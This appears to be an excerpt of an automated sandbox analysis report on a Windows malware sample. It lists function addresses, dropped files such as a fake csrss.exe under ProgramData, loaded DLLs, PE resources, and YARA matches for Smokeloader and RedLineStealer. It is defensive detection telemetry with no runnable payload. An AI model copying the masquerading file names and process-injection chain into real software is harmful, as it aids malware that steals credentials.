Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe

Code function: 0_2_00427C50: GetLastError,GetAtomNameA,DeviceIoControl,SetDefaultCommConfigA,CopyFileExA,FreeEnvironmentStringsW,AddAtomW,GetCurrentDirectoryW,GetModuleHandleA,LocalLock,GetProfileStringW,GetEnvironmentVariableW,QueryMemoryResourceNotification,GetConsoleAliasExesLengthW,SetTapeParameters,IsDBCSLeadByte,GetTempFileNameW,MoveFileExW,OpenWaitableTimerW,GetLongPathNameW,GetCompressedFileSizeW,GetPrivateObjectSecurity,GetAtomNameA,

0_2_00427C50

Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_0042B05C	0_2_0042B05C
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_0042C13B	0_2_0042C13B
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_0042BACB	0_2_0042BACB
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_00419B8F	0_2_00419B8F
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_004193AF	0_2_004193AF
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_0042C3B6	0_2_0042C3B6
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_00427C50	0_2_00427C50
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_00429C7B	0_2_00429C7B
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_0042B587	0_2_0042B587
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_00410D9B	0_2_00410D9B
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_00418EDA	0_2_00418EDA
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_0042C6BB	0_2_0042C6BB
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_0042F73B	0_2_0042F73B
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_00419783	0_2_00419783
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_00419FAF	0_2_00419FAF
Source: C:\Users\user\Desktop\xqz8sQ4mZB.exe	Code function: 0_2_0071D000	0_2_0071D000
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_0042B05C	3_2_0042B05C
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_0042C13B	3_2_0042C13B
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_0042BACB	3_2_0042BACB
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_00419B8F	3_2_00419B8F
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_004193AF	3_2_004193AF
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_0042C3B6	3_2_0042C3B6
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_00427C50	3_2_00427C50
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_00429C7B	3_2_00429C7B
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_0042B587	3_2_0042B587
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_00410D9B	3_2_00410D9B
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_00418EDA	3_2_00418EDA
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_0042C6BB	3_2_0042C6BB
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_0042F73B	3_2_0042F73B
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_00419783	3_2_00419783
Source: C:\Users\user\AppData\Roaming\ibjhisi	Code function: 3_2_00419FAF	3_2_00419FAF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04BA38EC	10_2_04BA38EC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04BA3498	10_2_04BA3498
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04BA531C	10_2_04BA531C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04BA1DA8	10_2_04BA1DA8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04BA5128	10_2_04BA5128
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04BA28A8	10_2_04BA28A8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04BA1020	10_2_04BA1020
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04BA3F64	10_2_04BA3F64
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04CD1CD0	10_2_04CD1CD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04CD88F0	10_2_04CD88F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04CDA190	10_2_04CDA190
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04CD1000	10_2_04CD1000
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04CD1310	10_2_04CD1310
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04CD8D20	10_2_04CD8D20
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04CDD420	10_2_04CDD420
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04CDD130	10_2_04CDD130
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04CD9580	10_2_04CD9580
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04CD9EA0	10_2_04CD9EA0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04CD9050	10_2_04CD9050
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04CD9260	10_2_04CD9260
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04CDD770	10_2_04CDD770
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04CDA520	10_2_04CDA520
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04CD9920	10_2_04CD9920
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6C9DB6B0	13_2_6C9DB6B0
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6CA2AC29	13_2_6CA2AC29
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6C9D2D70	13_2_6C9D2D70
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6CA04EE0	13_2_6CA04EE0
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6C9F4970	13_2_6C9F4970
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6C9F4AC0	13_2_6C9F4AC0
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6CA20B89	13_2_6CA20B89
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6C9B8B30	13_2_6C9B8B30
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6C9F4550	13_2_6C9F4550
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6CA2A54D	13_2_6CA2A54D
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6C9B6650	13_2_6C9B6650
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6C9BC7B0	13_2_6C9BC7B0
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6C9BA7E0	13_2_6C9BA7E0
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6C9CA0C0	13_2_6C9CA0C0
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6CA063B0	13_2_6CA063B0
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6CA12310	13_2_6CA12310
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6CA11CA0	13_2_6CA11CA0
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6C9F3C90	13_2_6C9F3C90
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6CA25DD2	13_2_6CA25DD2
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6CA05DD0	13_2_6CA05DD0
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6CA05EB9	13_2_6CA05EB9
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6C9F3E50	13_2_6C9F3E50
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6CA2BFF1	13_2_6CA2BFF1
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6CA29FFC	13_2_6CA29FFC
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6CA058D5	13_2_6CA058D5
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6CA058D7	13_2_6CA058D7
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6CA05830	13_2_6CA05830
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6CA2B964	13_2_6CA2B964
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6CA29AAB	13_2_6CA29AAB
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6C9F3460	13_2_6C9F3460
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6CA05050	13_2_6CA05050
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6CA05274	13_2_6CA05274
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_6C9F3260	13_2_6C9F3260
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_06D526F8	13_2_06D526F8
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_06D50EB3	13_2_06D50EB3
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_06D526DB	13_2_06D526DB
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_06D50930	13_2_06D50930
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: 13_2_06D74250	13_2_06D74250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_004211A0	16_2_004211A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0041F5F0	16_2_0041F5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_004206F0	16_2_004206F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0044C690	16_2_0044C690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0041FF30	16_2_0041FF30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00401000	16_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0043301F	16_2_0043301F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_004340C0	16_2_004340C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00432140	16_2_00432140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0043512D	16_2_0043512D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_004101D0	16_2_004101D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0043A1B0	16_2_0043A1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0042B250	16_2_0042B250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00403260	16_2_00403260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0042D263	16_2_0042D263
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00413210	16_2_00413210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0041A230	16_2_0041A230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_004382E0	16_2_004382E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00422280	16_2_00422280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0041F360	16_2_0041F360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0042D360	16_2_0042D360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00444380	16_2_00444380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0041C390	16_2_0041C390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00403440	16_2_00403440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00411400	16_2_00411400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00429487	16_2_00429487
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_004074A0	16_2_004074A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00404510	16_2_00404510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00430511	16_2_00430511
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0041B520	16_2_0041B520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0043A5C0	16_2_0043A5C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0043C5C0	16_2_0043C5C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_004355E6	16_2_004355E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0041D590	16_2_0041D590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0042C5AF	16_2_0042C5AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_004136C0	16_2_004136C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00433690	16_2_00433690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_004196A0	16_2_004196A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_004017F0	16_2_004017F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00429487	16_2_00429487
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_004217A0	16_2_004217A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0042A86A	16_2_0042A86A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00444A70	16_2_00444A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00431AD0	16_2_00431AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0042BB4B	16_2_0042BB4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0041AB50	16_2_0041AB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00433B6D	16_2_00433B6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0042DB07	16_2_0042DB07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00412BC0	16_2_00412BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00413BD0	16_2_00413BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00410BF0	16_2_00410BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0044DBF0	16_2_0044DBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0041BBA0	16_2_0041BBA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0042CC20	16_2_0042CC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00436C86	16_2_00436C86
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00437CB2	16_2_00437CB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00433B6D	16_2_00433B6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00435D89	16_2_00435D89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00434E66	16_2_00434E66
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00427EC8	16_2_00427EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0043CEA5	16_2_0043CEA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_0041CEB0	16_2_0041CEB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00436F41	16_2_00436F41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00430F68	16_2_00430F68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 16_2_00440F10	16_2_00440F10

Source: Joe Sandbox View

Dropped File: C:\ProgramData\Drivers\csrss.exe F3C70EC32049139737226C85A87D453AC98C6A0FFC7747BA4F65118A1B8EF670

Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: String function: 6CA19B35 appears 141 times
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: String function: 6CA190D8 appears 51 times
Source: C:\Users\user\AppData\Local\Temp\DFD5.exe	Code function: String function: 6CA1D520 appears 31 times

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 6844 -ip 6844

Source: 1DCB.exe.1.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 1DCB.tmp.38.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: 1DCB.tmp.38.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: 1DCB.tmp.38.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: 1DCB.tmp.38.dr	Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Source: 1DCB.tmp.44.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: 1DCB.tmp.44.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: 1DCB.tmp.44.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: 1DCB.tmp.44.dr	Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped

Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cdprt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Section loaded: csunsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Section loaded: swift.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Section loaded: nfhwcrhk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Section loaded: surewarehook.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Section loaded: csunsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Section loaded: aep.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Section loaded: atasi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Section loaded: swift.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Section loaded: nfhwcrhk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Section loaded: nuronssl.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Section loaded: surewarehook.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Section loaded: ubsec.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Section loaded: aep.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Section loaded: atasi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Section loaded: swift.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Section loaded: nfhwcrhk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Section loaded: nuronssl.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Section loaded: surewarehook.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Section loaded: ubsec.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CA65.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: csunsapi.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: swift.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: nfhwcrhk.dll
Source: C:\ProgramData\Drivers\csrss.exe	Section loaded: surewarehook.dll

Source: xqz8sQ4mZB.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0000001A.00000002.2142532116.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1690528865.000000000071D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001A.00000002.2142822770.000000000081D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000003.00000002.1929092219.0000000001F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000003.00000002.1929134962.0000000001FB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000001B.00000002.2142171453.0000000005600000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000006.00000002.1987043149.0000000005261000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001D.00000002.4256235874.0000000002B6C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1690470943.00000000006F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1690454958.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
